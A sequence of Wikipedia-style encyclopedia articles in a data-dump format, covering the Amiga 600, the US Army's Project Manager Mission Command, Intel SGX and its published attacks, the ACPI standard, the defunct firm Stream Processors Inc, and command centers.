The A600 is the first of only two Amiga models to feature a PCMCIA Type II interface. This connector allows use of a number of compatible peripherals available for the laptop-computer market, although only 16-bit PCMCIA cards are hardware-compatible; newer 32-bit PC Card (CardBus) peripherals are incompatible. Mechanically, only Type I and Type II cards fit in the slot; thicker Type III cards will not fit (although they may connect if the A600 is removed from its original case). The port is also not fully compliant with the PCMCIA Type II standard as the A600 was developed before the standard was finalized. The PCMCIA implementation on the A600 is almost identical to the one featured on a later Amiga, the 1200. A number of Amiga peripherals were released by third-party developers for this connector including SRAM cards, CD-ROM controllers, SCSI controllers, network cards, sound samplers, and video-capture devices. Although PCMCIA was similar in spirit to Commodore's expansion architecture for its earlier systems, the intended capability for convenient external expansion through this connector was largely unrealized at the time of release because of the prohibitive expense of PCMCIA peripherals for a lower-budget personal computer. Later, a number of compatible laptop-computer peripherals have been made to operate with the A600, including network cards (both wired and wireless), serial modems and CompactFlash adapters.
Operating system
The A600 shipped with AmigaOS 2.0, consisting of Workbench 2.0 and a Kickstart ROM revision 37.299, 37.300 or 37.350 (Commodore's internal revision numbers). Confusingly, all three ROM revisions were officially designated as version "2.05". Some early A600s shipped with Kickstart 37.299, which had neither support for the internal ATA controller, nor for the PCMCIA interface. Although it is possible to load the necessary drivers from floppy disk, it is not possible to boot directly from ATA or PCMCIA devices. Models fitted with Kickstart 37.300 or 37.350 can utilize those devices at boot time. Version 37.350 improved compatibility with ATA hard disks by increasing the wait time for disks to spin up during boot.
Specifications
Bundled software
In addition to the stock A600, mouse, power supply, and Workbench disk package, the A600 was available with the following software and hardware bundles:
'Lemmings' bundle (1992): Lemmings and the Electronic Arts graphics package Deluxe Paint III.
'Robocop 3D' bundle (1992): Robocop 3D, Myth, Shadow of the Beast III, Graphic Workshop and Microtext
'Wild, Weird and Wicked' bundle (late 1992, £349 launch price): Formula One Grand Prix, Pushover, Putty and Deluxe Paint III
A600HD 'Epic/Language' bundle (1992, £499 launch price): including an internal 20 MB hard disk drive, a word processor, Trivial Pursuit, Myth, Rome and Epic.
Upgrades
CPU
Despite that the 68000 is soldered to the motherboard, unofficial CPU upgrades include the Motorola 68010, 68020 (at up to 25 MHz), and 68030 (at up to 50 MHz). The processor is upgraded not by replacing the 68000, but rather by fitting a connector over the CPU and commandeering the system bus. However, this approach caused instability problems with some board designs, prompting custom modifications for stable operation. As a result, such CPU expansions were largely unpopular.
Memory
RAM can be upgraded to a maximum of 2 MB "chip RAM" using the trap-door expansion slot. An additional 4 MB of "fast RAM" can be added in the PC Card slot using a suitable SRAM card to reach a capacity of 6 MB. However, more "fast RAM" can be added with unofficial memory or CPU upgrades. For example, the A608 board adds up to a maximum of 8 MB additional RAM by connecting over the original 68000. Likewise, CPU upgrades can accommodate up to 64 MB.
Operating system
It is possible to upgrade the A600 to Workbench 2.1. This features a localization of the operating system in several languages and has a "CrossDOS" driver providing read/write support for FAT (MS-DOS)-formatted media such as floppy disks or hard drives. Workbench 2.1 was a software only update which runs on all Kickstart ROMs of the 2.0x family.
Following the release of AmigaOS 3.1 in 1994 it was possible to upgrade the A600 by installing a compatible revision 40.63 Kickstart ROM.
Other
The FPGA-driven Vampire adds 128MB Fastmem RAM, HDMI output, SD card for HDD storage and a 64-bit core with full 32-bit compatibility.
See also
Amiga models and variants
References
Karl Foster (ed), "10 Totally Amazing Euro-Amiga Facts", Amiga Format, Annual 1993, p 55.
External links
History page
The Extreme A600 Upgrade Page
A600 specifications and motherboard photos
More A600 specifications including processor and RAM upgrades
Amiga-Stuff hardware information
Famous Amiga Uses
Amiga
68000-based home computers
|
36725176
|
https://en.wikipedia.org/wiki/Project%20Manager%20Mission%20Command
|
Project Manager Mission Command
|
Project Manager Mission Command (or PM MC) is a component of Program Executive Office Command, Control and Communications-Tactical in the United States Army. PM MC develops, deploys and sustains integrated Mission Command software capabilities to the Army and Joint forces. PM MC’s support ensures tactical and other unit types are efficiently fielded, effectively trained and professionally supported. Product lines include the areas of maneuver, fires, sustainment, and infrastructure.
Mission statement
"To provide intuitive, adaptive mission command and situational awareness capabilities for the command post and platform that enable mission execution by commanders and leaders at all levels to be more effective, agile and decisive."
About PM MC
"PM MC delivers capabilities across the warfighting functions of movement and maneuver, command and control, fires, sustainment, protection, intelligence and engagement. Implementing the Army’s Common Operating Environment, PM MC fields the Command Post Computing Environment (CP CE) and, the Mounted Computing Environment (MCE) while facilitating interoperability between CP CE, MCE and other CEs. PM MC uses an agile development process to achieve both near-term deliveries to current systems and longer-term development to enhance mission command capabilities."
Alternate definitions
The Army’s framework for exercising mission command is the operations process-the major mission command activities performed during operations: planning, preparing, executing, and continuously assessing the operation.
The concept of mission command is to help Army forces function effectively and accomplish missions. The Army’s primary mission is to organize, train, and equip forces to conduct prompt sustained land combat operations.
History
PM Battle Command
PM Mission Command
Merge with Project Manager JBC-P
In May 2014 Project Manager Mission Command merged with Project Manager Joint Battle Command-Platform (PM JBC-P) under Mission Command. PdM JBC-P transitioned into a subordinate product of PM MC.
Col. Michael Thurston, the former project manager for PM JBC-P assumed command of PM MC. The intent of the combined organization was to consolidate and simplify the many different digital systems that the military uses.
PM MC organization
PM MC's product offices are Tactical Mission Command (TMC), Fire Support Command and Control (FSC2), Joint Battle Command-Platform (JBC-P), Strategic Mission Command (SMC), Tactical Digital Media (TDM), and Command Post Computing Environment (CP CE).
Tactical Mission Command provides the Army’s core mission command and collaborative environment and maneuver applications, which include Command Post of the Future (CPOF), Command Web, and Common Tactical Vision (CTV)
Fire Support Command and Control provides lethal and non-lethal fires through products including Advanced Field Artillery Tactical Data System (AFATDS), Joint Automated Deep Operations Coordination System (JADOCS), Pocket-Sized Forward Entry Device (PFED), Lightweight Forward Entry Device (LFED), CENTAUR (Lightweight Technical Fire Direction System) and Gun Display Unit-Replacement (GDU-R)
Joint Battle Command-Platform
Strategic Mission Command provides operational and strategic tools through products including Battle Command Common Services (BCCS), Global Command and Control System-Army (GCCS-A), Common Software, Joint Convergence/Multilateral Interoperability Program (MIP), Battle Command and Staff Training (BCST), and Tactical Edge Data Solutions Joint Capability Technology Demonstration (TEDS JCTD).
Tactical Digital Media
Command Post Computing Environment
References
External links
PM MC Public Site
Research installations of the United States Army
Military installations in Maryland
Commands of the United States Army
Military acquisition
United States defense procurement
Command and control systems of the United States military
|
46464527
|
https://en.wikipedia.org/wiki/Software%20Guard%20Extensions
|
Software Guard Extensions
|
Intel Software Guard Extensions (SGX) is a set of security-related instruction codes that are built into some Intel central processing units (CPUs). They allow user-level as well as operating system code to define private regions of memory, called enclaves, whose contents are intended to be protected and unreadable by any process outside the enclave itself, including processes running at higher privilege levels. These design goals were not met; numerous attacks were found, leading Intel to stop offering SGX in newer processors.
SGX involves encryption by the CPU of a portion of memory. The enclave is decrypted on the fly only within the CPU itself, and even then, only for code and data running from within the enclave itself. The processor thus protects the code from being "spied on" or examined by other code. The code and data in the enclave utilize a threat model in which the enclave is trusted but no process outside it can be trusted (including the operating system itself and any hypervisor), and therefore all of these are treated as potentially hostile. The enclave contents are unable to be read by any code outside the enclave, other than in its encrypted form. Applications running inside of SGX must be written to be side channel resistant as SGX does not protect against side channel measurement or observation.
SGX is designed to be useful for implementing secure remote computation, secure web browsing, and digital rights management (DRM). Other applications include concealment of proprietary algorithms and of encryption keys.
Details
SGX was first introduced in 2015 with the sixth generation Intel Core microprocessors based on the Skylake microarchitecture.
Support for SGX in the CPU is indicated in CPUID "Structured Extended feature Leaf", EBX bit 02, but its availability to applications requires BIOS/UEFI support and opt-in enabling which is not reflected in CPUID bits. This complicates the feature detection logic for applications.
Emulation of SGX was added to an experimental version of the QEMU system emulator in 2014. In 2015, researchers at the Georgia Institute of Technology released an open-source simulator named "OpenSGX".
One example of SGX used in security was a demo application from wolfSSL using it for cryptography algorithms.
Intel Goldmont Plus (Gemini Lake) microarchitecture also contains support for Intel SGX.
Both in the 11th and 12th generations of Intel Core processors, SGX is listed as "Deprecated" and thereby not supported anymore.
Attacks
Prime+Probe attack
On 27 March 2017 researchers at Austria's Graz University of Technology developed a proof-of-concept that can grab RSA keys from SGX enclaves running on the same system within five minutes by using certain CPU instructions in lieu of a fine-grained timer to exploit cache DRAM side-channels. One countermeasure for this type of attack was presented and published by Daniel Gruss et al. at the USENIX Security Symposium in 2017. Among other published countermeasures, one countermeasure to this type of attack was published on September 28, 2017, a compiler-based tool, DR.SGX, that claims to have superior performance with the elimination of the implementation complexity of other proposed solutions.
Spectre-like attack
The LSDS group at Imperial College London showed a proof of concept that the Spectre speculative execution security vulnerability can be adapted to attack the secure enclave. The Foreshadow attack, disclosed in August 2018, combines speculative execution and buffer overflow to bypass the SGX.
Enclave attack
On 8 February 2019, researchers at Austria's Graz University of Technology published findings, which showed that in some cases it is possible to run malicious code from within the enclave itself. The exploit involves scanning through process memory, in order to reconstruct a payload, which can then run code on the system. The paper claims that due to the confidential and protected nature of the enclave, it is impossible for antivirus software to detect and remove malware residing within it. However, since modern anti-malware and antivirus solutions monitor system calls, and the interaction of the application with the operating system, it should be possible to identify malicious enclaves by their behavior, and this issue is unlikely to be a concern for state-of-the-art antiviruses. Intel issued a statement, stating that this attack was outside the threat model of SGX, that they cannot guarantee that code run by the user comes from trusted sources, and urged consumers to only run trusted code.
MicroScope replay attack
There is a proliferation of Side-channel attack plaguing modern computer architectures. Many of these attacks measure slight, nondeterministic variations in the execution of some code, so the attacker needs many, possibly tens of thousands, of measurements to learn secrets. However, the Microscope attack allows a malicious OS to replay code an arbitrary number of times regardless of the programs actual structure, enabling dozens of side-channel attacks.
Plundervolt
Security researchers were able to inject timing specific faults into execution within the enclave,
resulting in leakage of information. The attack can be executed remotely, but requires
access to the privileged control of the processor's voltage and frequency.
LVI
Load Value Injection injects data into a program aiming to replace the value loaded from memory which is then used for a short time before the mistake is spotted and rolled back, during which LVI controls data and control flow.
SGAxe
SGAxe, a SGX vulnerability, extends a speculative execution attack on cache, leaking content of the enclave. This allows an attacker to access private CPU keys used for remote attestation. In other words, a threat actor can bypass Intel's countermeasures to breach SGX's enclaves' confidentiality. The SGAxe attack is carried out by extracting attestation keys from SGX's private quoting enclave, that are signed by Intel. The attacker can then masquerade as legitimate Intel machines by signing arbitrary SGX attestation quotes.
See also
Intel MPX
Spectre-NG
Trusted execution environment (TEE)
References
External links
Intel Software Guard Extensions (Intel SGX) / ISA Extensions, Intel
Intel Software Guard Extensions (Intel SGX) Programming Reference, Intel, October 2014
IDF 2015 - Tech Chat: A Primer on Intel Software Guard Extensions, Intel (poster)
ISCA 2015 tutorial slides for Intel SGX, Intel, June 2015
McKeen, Frank, et al. (Intel), Innovative Instructions and Software Model for Isolated Execution // Proceedings of the 2nd International Workshop on Hardware and Architectural Support for Security and Privacy. ACM, 2013.
Jackson, Alon, (PhD dissertation). Trust is in the Keys of the Beholder: Extending SGX Autonomy and Anonymity, May 2017.
Joanna Rutkowska, Thoughts on Intel's upcoming Software Guard Extensions (Part 1), August 2013
SGX: the good, the bad and the downright ugly / Shaun Davenport, Richard Ford (Florida Institute of Technology) / Virus Bulletin, 2014-01-07
Victor Costan and Srinivas Devadas, Intel SGX Explained, January 2016.
wolfSSL, October 2016.
The Security of Intel SGX for Key Protection and Data Privacy Applications / Professor Yehuda Lindell (Bar Ilan University & Unbound Tech), January 2018
Intel SGX Technology and the Impact of Processor Side-Channel Attacks, March 2020
How Confidential Computing Delivers A Personalised Shopping Experience, January 2021
Intel
X86 instructions
Computer security
|
2432697
|
https://en.wikipedia.org/wiki/Advanced%20Configuration%20and%20Power%20Interface
|
Advanced Configuration and Power Interface
|
In a computer, the Advanced Configuration and Power Interface (ACPI) provides an open standard that operating systems can use to discover and configure computer hardware components, to perform power management e.g. putting unused hardware components to sleep, to perform auto configuration e.g. Plug and Play and hot swapping, and to perform status monitoring. First released in December 1996, ACPI aims to replace Advanced Power Management (APM), the MultiProcessor Specification, and the Plug and Play BIOS (PnP) Specification. ACPI brings power management under the control of the operating system, as opposed to the previous BIOS-centric system that relied on platform-specific firmware to determine power management and configuration policies. The specification is central to the Operating System-directed configuration and Power Management (OSPM) system. ACPI defines hardware abstraction interfaces between the devices firmware (e.g. BIOS, UEFI), the computer hardware components, and the operating systems.
Internally, ACPI advertises the available components and their functions to the operating system kernel using instruction lists ("methods") provided through the system firmware (UEFI or BIOS), which the kernel parses. ACPI then executes the desired operations written in ACPI Machine Language (such as the initialization of hardware components) using an embedded minimal virtual machine.
Intel, Microsoft and Toshiba originally developed the standard, while HP, Huawei and Phoenix also participated later. In October 2013, ACPI Special Interest Group (ACPI SIG), the original developers of the ACPI standard, agreed to transfer all assets to the UEFI Forum, in which all future development will take place.
The UEFI Forum published of the standard, "Revision 6.4", in end of January 2021.
Architecture
The firmware-level ACPI has three main components: the ACPI tables, the ACPI BIOS, and the ACPI registers. The ACPI BIOS generates ACPI tables and loads ACPI tables into main memory. Many of the firmware ACPI functionality is provided in bytecode of ACPI Machine Language (AML), a Turing-complete, domain-specific low-level language, stored in the ACPI tables. To make use of the ACPI tables, the operating system must have an interpreter for the AML bytecode. A reference AML interpreter implementation is provided by the ACPI Component Architecture (ACPICA). At the BIOS development time, AML bytecode is compiled from the ASL (ACPI Source Language) code.
Overall design decision was not without criticism. In November 2003, Linus Torvalds—author of the Linux kernel—described ACPI as "a complete design disaster in every way". In 2001, other senior Linux software developers like Alan Cox expressed concerns about the requirements that bytecode from an external source must be run by the kernel with full privileges, as well as the overall complexity of the ACPI specification. In 2014, Mark Shuttleworth, founder of the Ubuntu Linux distribution, compared ACPI with Trojan horses.
ACPI Component Architecture (ACPICA)
The ACPI Component Architecture (ACPICA), mainly written by Intel's engineers, provides an open-source platform-independent reference implementation of the operating system–related ACPI code. The ACPICA code is used by Linux, Haiku, ArcaOS and FreeBSD, which supplement it with their operating-system specific code.
History
The first revision of the ACPI specification was released in December 1996, supporting 16, 24 and 32-bit addressing spaces. It was not until August 2000 that ACPI received 64-bit address support as well as support for multiprocessor workstations and servers with revision 2.0.
In September 2004, revision 3.0 was released, bringing to the ACPI specification support for SATA interfaces, PCI Express bus, multiprocessor support for more than 256 processors, ambient light sensors and user-presence devices, as well as extending the thermal model beyond the previous processor-centric support.
Released in June 2009, revision 4.0 of the ACPI specification added various new features to the design; most notable are the USB 3.0 support, logical processor idling support, and x2APIC support.
Revision 5.0 of the ACPI specification was released in December 2011, which added the ARM architecture support. The revision 5.1 was released in July 2014.
The latest specification revision is 6.4, which was released in January 2021.
Operating systems
Microsoft's Windows 98 was the first operating system to implement ACPI, but its implementation was somewhat buggy or incomplete, although some of the problems associated with it were caused by the first-generation ACPI hardware. Other operating systems, including later versions of Windows, eComStation, ArcaOS, FreeBSD (since FreeBSD 5.0), NetBSD (since NetBSD 1.6), OpenBSD (since OpenBSD 3.8), HP-UX, OpenVMS, Linux, GNU Hurd and PC versions of Solaris, have at least some support for ACPI. Some newer operating systems, like Windows Vista, require the computer to have an ACPI-compliant BIOS, and since Windows 8, the S0ix/Modern Standby state was implemented.
Windows operating systems use acpi.sys to access ACPI events.
ACPI could be disabled on Windows XP and earlier by pressing the F7 key to disable ACPI when Windows setup is starting. With the release of Windows Vista and later, it is no longer possible to do this. In addition, if you have a laptop where Windows cannot interpret its ACPI when trying to install, it will result in a "This BIOS is not ACPI-Complient" 0x0A5 Blue Screen of Death. This problem could be circumvented by pressing F7 on XP and earlier, however, newer Windows such as Vista will require a patch to Windows ACPI.sys driver slipstreamed into the installation media to bypass the issue due to the lack of F7 option during setup.
The 2.4 series of the Linux kernel had only minimal support for ACPI, with better support implemented (and enabled by default) from kernel version 2.6.0 onwards. Old ACPI BIOS implementations tend to be quite buggy, and consequently are not supported by later operating systems. For example, Windows 2000, Windows XP, and Windows Server 2003 only use ACPI if the BIOS date is after January 1, 1999. Similarly, Linux kernel 2.6 blacklisted any ACPI BIOS from before January 1, 2001.
Linux-based operating systems can provide access to ACPI events via acpid.
OSPM responsibilities
Once an OSPM-compatible operating system activates ACPI, it takes exclusive control of all aspects of power management and device configuration. The OSPM implementation must expose an ACPI-compatible environment to device drivers, which exposes certain system, device and processor states.
Power states
Global states
The ACPI Specification defines the following four global "Gx" states and six sleep "Sx" states for an ACPI-compliant computer system:
The specification also defines a Legacy state: the state of an operating system which does not support ACPI. In this state, the hardware and power are not managed via ACPI, effectively disabling ACPI.
Device states
The device states D0–D3 are device dependent:
D0 or Fully On is the operating state.
As with S0ix, Intel has D0ix states for intermediate levels on the SoC.
D1 and D2 are intermediate power-states whose definition varies by device.
D3: The D3 state is further divided into D3 Hot (has auxiliary power), and D3 Cold (no power provided):
Hot: A device can assert power management requests to transition to higher power states.
Cold or Off has the device powered off and unresponsive to its bus.
Processor states
The CPU power states C0–C3 are defined as follows:
C0 is the operating state.
C1 (often known as Halt) is a state where the processor is not executing instructions, but can return to an executing state essentially instantaneously. All ACPI-conformant processors must support this power state. Some processors, such as the Pentium 4 and AMD Athlon, also support an Enhanced C1 state (C1E or Enhanced Halt State) for lower power consumption, however this proved to be buggy on some systems.
C2 (often known as Stop-Clock) is a state where the processor maintains all software-visible state, but may take longer to wake up. This processor state is optional.
C3 (often known as Sleep) is a state where the processor does not need to keep its cache coherent, but maintains other state. Some processors have variations on the C3 state (Deep Sleep, Deeper Sleep, etc.) that differ in how long it takes to wake the processor. This processor state is optional.
Additional states are defined by manufacturers for some processors. For example, Intel's Haswell platform has states up to C10, where it distinguishes core states and package states.
Performance state
While a device or processor operates (D0 and C0, respectively), it can be in one of several power-performance states. These states are implementation-dependent. P0 is always the highest-performance state, with P1 to Pn being successively lower-performance states, up to an implementation-specific limit of n no greater than 16.
P-states have become known as SpeedStep in Intel processors, as PowerNow! or Cool'n'Quiet in AMD processors, and as PowerSaver in VIA processors.
P0 maximum power and frequency
P1 less than P0, voltage and frequency scaled
P2 less than P1, voltage and frequency scaled
Pn less than P(n–1), voltage and frequency scaled
Hardware interface
ACPI-compliant systems interact with hardware through either a "Function Fixed Hardware (FFH) Interface", or a platform-independent hardware programming model which relies on platform-specific ACPI Machine Language (AML) provided by the original equipment manufacturer (OEM).
Function Fixed Hardware interfaces are platform-specific features, provided by platform manufacturers for the purposes of performance and failure recovery. Standard Intel-based PCs have a fixed function interface defined by Intel, which provides a set of core functionality that reduces an ACPI-compliant system's need for full driver stacks for providing basic functionality during boot time or in the case of major system failure.
ACPI Platform Error Interface (APEI) is a specification for reporting of hardware errors, e.g. chipset, RAM to the operating system.
Firmware interface
ACPI defines many tables that provide the interface between an ACPI-compliant operating system and system firmware (BIOS or UEFI). This includes RSDP, RSDT, XSDT, FADT, FACS, DSDT, SSDT, MADT, and MCFG, for example.
The tables allow description of system hardware in a platform-independent manner, and are presented as either fixed-formatted data structures or in AML. The main AML table is the DSDT (differentiated system description table). The AML can be decompiled by tools like Intel's iASL (open-source, part of ACPICA) for purposes like patching the tables for expanding OS compatibility.
The Root System Description Pointer (RSDP) is located in a platform-dependent manner, and describes the rest of the tables.
Security risks
Ubuntu founder Mark Shuttleworth has likened ACPI to Trojan horses. He has described proprietary firmware (ACPI-related or any other firmware) as a security risk, saying that "firmware on your device is the NSA's best friend" and calling firmware (ACPI or non-ACPI) "a Trojan horse of monumental proportions". He has pointed out that low quality, closed source firmware is a major threat to system security: "Your biggest mistake is to assume that the NSA is the only institution abusing this position of trust – in fact, it's reasonable to assume that all firmware is a cesspool of insecurity, courtesy of incompetence of the highest degree from manufacturers, and competence of the highest degree from a very wide range of such agencies." As a solution to this problem, he has called for open-source, declarative firmware (ACPI or non-ACPI), which instead of containing executable code, only describes "hardware linkage and dependencies".
A custom ACPI table called the Windows Platform Binary Table (WPBT) is used by Microsoft to allow vendors to add software into the Windows OS automatically. Some vendors, such as Lenovo and Samsung, have been caught using this feature to install harmful software such as Superfish. Windows versions older than Windows 7 do not support this feature, but alternative techniques can be used. This behavior has been compared to rootkits.
See also
Active State Power Management
Coreboot
Green computing
Power management keys
Unified Extensible Firmware Interface
Wake-on-LAN
SBSA
References
External links
(UEFI and ACPI specifications)
Everything You Need to Know About the CPU C-States Power Saving Modes
Sample EFI ASL code used by VirtualBox; EFI/ASL code itself is from the open source Intel EFI Development Kit II (TianoCore)
ACPICA
BIOS
Unified Extensible Firmware Interface
Application programming interfaces
Computer hardware standards
Open standards
Electric power
System administration
|
13931621
|
https://en.wikipedia.org/wiki/Stream%20Processors%2C%20Inc
|
Stream Processors, Inc
|
Stream Processors, Inc was a Silicon Valley-based fabless semiconductor company specializing in the design and manufacture of high-performance digital signal processors for applications including video surveillance, multi-function printers and video conferencing. The company ceased operations in 2009.
Company history
Foundational work in stream processing was initiated in
1995 by a research team led by MIT professor Bill Dally. In 1996, he moved to Stanford University where he continued this work, receiving a multimillion-dollar
grant from DARPA with additional resources from Intel and
Texas Instruments to fund the development of a project called "Imagine"
- the first stream processor chip and accompanying compiler tools.
The Imagine Project
The goal of the Imagine project was to develop a
C programmable signal and image processor intended to provide both the performance density and efficiency of a
special-purpose processor (such as a hard-wired ASIC). The project successfully demonstrated the advantages of stream processing. Details on the Imagine project and its results are posted
on the Stanford Imagine project page. The work also showed that a number of applications
ranging from wireless baseband processing, 3D graphics, encryption, IP
forwarding to video processing could take advantage of the efficiency of stream processing. This research inspired other
designs such as GPUs from ATI Technologies as well as the Cell microprocessor from Sony, Toshiba, and IBM.
The main deliverables from the Imagine program included:
The Imagine Stream Architecture
The Stream programming model
Software development tools
Programmable graphics and real-time media applications
VLSI prototype (fabricated by TI)
Stream processor development platform (a prototype development board)
SPI established
Dally, together with other team members, obtained a license from Stanford to commercialize the
resulting technology. Stream Processors, Incorporated (SPI) was incorporated in
California in 2004. Professor Dally remained at Stanford and the company
hired industry veteran Chip Stearns to become the President and CEO in December of that
year. Through June, 2006 SPI has been able to raise a total of $26M from a trio of notable venture capital firms - Austin Ventures, Norwest Venture Partners and the Woodside Fund.
The company launched its first two products concurrently with the International Solid State
Circuits Conference (ISSCC) in February, 2006 and
has introduced two others since.
SPI has headquarters located in Sunnyvale, California as well as a software development group (SPI Software Technologies Pvt. Ltd) located in Bangalore, India.
In January 2009 Co-Founder Prof. Bill Dally accepted a position as Chief Scientist with NVIDIA Corporation. At the same time he
resigned as chairman. In an interview Dally reflected on his experiences with startups:
" I have done several chip startups myself. It’s getting hard. The ante is very high. If you do a chip startup, you need patient investors with very deep pockets. It’s many tens of millions of dollars to get to a first product and $50 million to get to profits. That’s very difficult to do because investors want an exit some multiple over that investment. I am hoping we return to the days of frequent IPOs and get beyond the fire-sale acquisitions. That’s not what you can see right now. If it’s a programmable chip, the cost is even more."
In the summer of 2009 CEO Stearns left the company and was replaced by Mike Fister, an executive with senior level experience at Cadence Design Systems and Intel.
In September 2009 the company ceased operations.
Technology
Similar to graphics and scientific computing, media and signal processing
are characterized by available data-parallelism, locality and a high computation
to global memory access ratio. Stream processing exploits these
characteristics using data-parallel processing fed by a distributed memory
hierarchy managed by the compiler. The main challenge for next generation massively parallel processors is data bandwidth, not computational resources. Unlike most conventional processors, the technology does not rely on a hardware cache - instead data movement is explicitly managed by the compiler and hardware.
The execution model is based on accelerating performance-critical functions (kernels) that process and
produce data records (streams). Kernels and streams are scheduled at compile-time and moved to on-chip memory at runtime via a scoreboard. The compiler analyses data live times
of streams to optimize allocation and minimize external memory bandwidth needs.
Streams and kernels loads can overlap with execution to improve latency
tolerance and the explicit data movement provides predictable performance. There
are no CPU cache misses and the design presents a single-core model to the
programmer – data-parallelism is within the kernels.
Architecture
The architecture includes a host CPU (System MIPS) for system-level tasks and a
DSP Coprocessor Subsystem where the DSP MIPS runs the main threads that make
kernel function calls to the Data Parallel Unit (DPU). For users that use
libraries, and don't intend to develop DSP code, the architecture is a
MIPS-based system-on-a-chip with an API to a “black box”
coprocessor. The DPU Dispatcher receives kernel function calls to manage
runtime kernel and stream loads. One kernel at a time is executed across the
lanes, operating on local stream data stored in the Lane Register File of each lane. Each
lane has a set of VLIW ALUs and distributed operand register files (ORF)
allow for a large working data set and processing bandwidth exceeding 1 TeraByte/s. The Stream
Load/Store Unit provides gather/scatter with a wide variety of access patterns.
The InterLane Switch is a compiler-scheduled, full crossbar for high-speed
access between lanes.
Tools
SPI's RapiDev Tools Suite leverages the
predictability of stream processing to provide a fast path to optimized
results using C programming. Starting with C reference code, the Fast
Functional Debugger (FFD) library plugs into standard tools, such as Microsoft
Visual Studio and GNU, and simulates the DPU to support re-structuring code to
kernels and streams. Because kernels are statically scheduled and data movement
is explicit, DPU cycle-accuracy can be obtained even at this functional high
level. This is one source of the predictability of the architecture. For
targeting code to the device, the Stream Processor Compiler (SPC) generates the
VLIW executable and pre-processed C code that is compiled/linked via standard
GCC for MIPS. SPC allocates streams in the Lane Register Files and provides
dependency information for the kernel function calls. Software pipelining and
loop unrolling are supported. Branch penalties are avoided by predicated selects
and larger conditionals use conditional streams. Running under Eclipse, the
Target Code Simulator provides comprehensive Host or Device binary code
simulation with breakpoint and single-stepping capabilities with bandwidth and
load statistics. A kernel view shows the VLIW pipeline for kernel optimizations,
and a stream view shows kernel execution and stream loads to review global data
movement for system profiling.
Products
SPI currently markets its Storm-1 family, that includes four fully software programmable DSPs of varying performance levels.
Note: GMACS stands for Giga (billions of) Multiply-Accumulate operations per Second, a common measure of DSP
performance.
Support hardware and software
The RapiDev tools suite delivers a fast, predictable path to optimized results, eliminating the complexities of assembly coding or manual cache management
The Storm-1 DevKit is a PCI-based software development platform
IP Camera Reference Design runs standard Linux 2.6 and supports multiple simultaneous codecs (e.g. H.264, MPEG-4 and MJPEG), arbitrary resolutions, CMOS and CCD sensor processing as well as video analytics in a fully software programmable platform
Video Streamer Reference Design supports eight 4CIF input channels of video compressed to H.264 and a Gigabit Ethernet output
References
External links
The Imagine Project (Stanford) website
Fabless semiconductor companies
Electronics companies established in 2004
Companies based in Sunnyvale, California
Defunct semiconductor companies of the United States
|
2736110
|
https://en.wikipedia.org/wiki/Command%20center
|
Command center
|
A command center (often called a war room) is any place that is used to provide centralized command for some purpose.
While frequently considered to be a military facility, these can be used in many other cases by governments or businesses. The term "war room" is also often used in politics to refer to teams of communications people who monitor and listen to the media and the public, respond to inquiries, and synthesize opinions to determine the best course of action.
If all functions of a command center are located in a single room this is often referred to as a control room. However in business management teams, the term "war room" is still frequently used, especially when the team is focusing on the necessary strategy and tactics to accomplish some goal the business finds important. The war room in many cases is different than a command center because one may be formed to deal with a particular crisis such as sudden unfavorable media, and the war room is convened in order to brainstorm ways to deal with it. A large corporation can have several war rooms to deal with different goals or crises.
A command center enables an organization to function as designed, to perform day-to-day operations regardless of what is happening around it, in a manner in which no one realizes it is there but everyone knows who is in charge when there is trouble.
Conceptually, a command center is a source of leadership and guidance to ensure that service and order is maintained, rather than an information center or help desk. Its tasks are achieved by monitoring the environment and reacting to events, from the relatively harmless to a major crisis, using predefined procedures.
Types of command centers
There are many types of command centers. They include:
Data center management Oversees the central management and operating control for the computer systems that are essential most businesses, usually housed in data centers and large computer rooms.
Business application management Ensures applications that are critical to customers and businesses are always available and working as designed.
Civil management Oversees the central management and control of civil operational functions. Staff members in those centers monitor the metropolitan environment to ensure the safety of people and the proper operation of critical government services, adjusting services as required and ensuring proper constant movement.
Emergency (crisis) management Directs people, resources, and information, and controls events to avert a crisis/emergency and minimize/avoid impacts should an incident occur.
Types of command and control rooms and their responsibilities
Command Center (CC or ICC)
Data center, computer system, incident response
Network Operation Centers (NOC)
Network equipment and activity
Tactical Operation Centers (TOC)
Military operations
Police and intelligence
Security Operation Centers (SOC)
Security agencies
Government agencies
Traffic management
CCTV
Emergency Operation Centers (EOC)
Emergency services
Combined Operation Centers (COS)
Air traffic control
Oil and gas
Control rooms
Broadcast
Audio Visual (AV)
Simulation and training
Medical
Social Media Command Center
Monitoring, posting and responding on social media sites
Military and government
A command center is a central place for carrying out orders and for supervising tasks, also known as a headquarters, or HQ.
Common to every command center are three general activities: inputs, processes, and outputs. The inbound aspect is communications (usually intelligence and other field reports). Inbound elements are "sitreps" (situation reports of what is happening) and "progreps" (progress reports relative to a goal that has been set) from the field back to the command element.
The process aspect involves a command element that makes decisions about what should be done about the input data. In the US military, the command consists of a field – (Major to Colonel) or flag – (General) grade commissioned officer with one or more advisers. The outbound communications then delivers command decisions (i.e., operating orders) to the field elements.
Command centers should not be confused with the high-level military formation of a Command – as with any formation, Commands may be controlled from a command center, however not all formations controlled from a command centre are Commands.
Examples
Canada
During the Cold War, the Government of Canada undertook the construction of "Emergency Government Headquarters", to be used in the event of nuclear warfare or other large-scale disaster. Canada was generally allied with the United States for the duration of the war, was a founding member of NATO, allowed American cruise missiles to be tested in the far north, and flew sovereignty missions in the Arctic.
For these reasons, the country was often seen as being a potential target of the Soviets at the height of nuclear tensions in the 1960s. Extensive post-attack plans were drawn up for use in emergencies, and fallout shelters were built all across the country for use as command centres for governments of all levels, the Canadian Forces, and rescue personnel, such as fire services.
Different levels of command centres included:
CEGF, Central Emergency Government Facility, located in Carp, Ontario, near the National Capital Region. Designed for use by senior federal politicians and civil servants.
REGHQ, Regional Emergency Government Headquarters, of which there were seven, spread out across the country.
MEGHQ, Municipal Emergency Government Headquarters
ZEGHQ, Zone Emergency Government Headquarters, built within the basements of existing buildings, generally designed to hold around 70 staff.
RU, Relocation Unit, or CRU, Central Relocation Unit. Often bunkers built as redundant backups to REGHQs and MEGHQs were given the RU designation.
Serbia
Joint Operations Command (JOC) is the organizational unit of the Serbian Armed Forces directly subordinated to the General Staff of the Armed Forces. The main duty of the Command is to conduct operational command over the Armed Forces. The Operations Command has a flexible formation, which is expanded by the representatives of other organizational units of the General Staff, and, if there is a need, operational level commands. In peacetime, the commander of the Joint Operations Command is at the same time Deputy of Serbian Armed Forces General Staff.
United Kingdom
Constructed in 1938, the Cabinet War Rooms were used extensively by Sir Winston Churchill during the Second World War.
